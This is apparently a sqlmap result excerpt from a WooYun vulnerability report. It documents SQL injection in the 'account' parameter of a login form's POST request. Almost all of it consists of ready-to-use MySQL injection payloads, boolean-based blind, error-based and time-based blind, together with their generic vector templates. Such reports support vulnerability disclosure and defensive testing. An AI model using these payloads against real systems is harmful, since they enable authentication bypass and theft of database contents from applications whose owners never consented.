WooYun.org

Parameter: account (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: done=&account=admin' RLIKE (SELECT (CASE WHEN (3661=3661) THEN 0x61646d696e ELSE 0x28 END)) AND 'XSWF'='XSWF&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: done=&account=admin' AND (SELECT 9467 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(9467=9467,1))),0x71766b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sMbe'='sMbe&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: done=&account=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))uOwx) AND 'XHgB'='XHgB&password=aaaaaa&Submit=%E7%A1%AE%E8%AE%A4
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])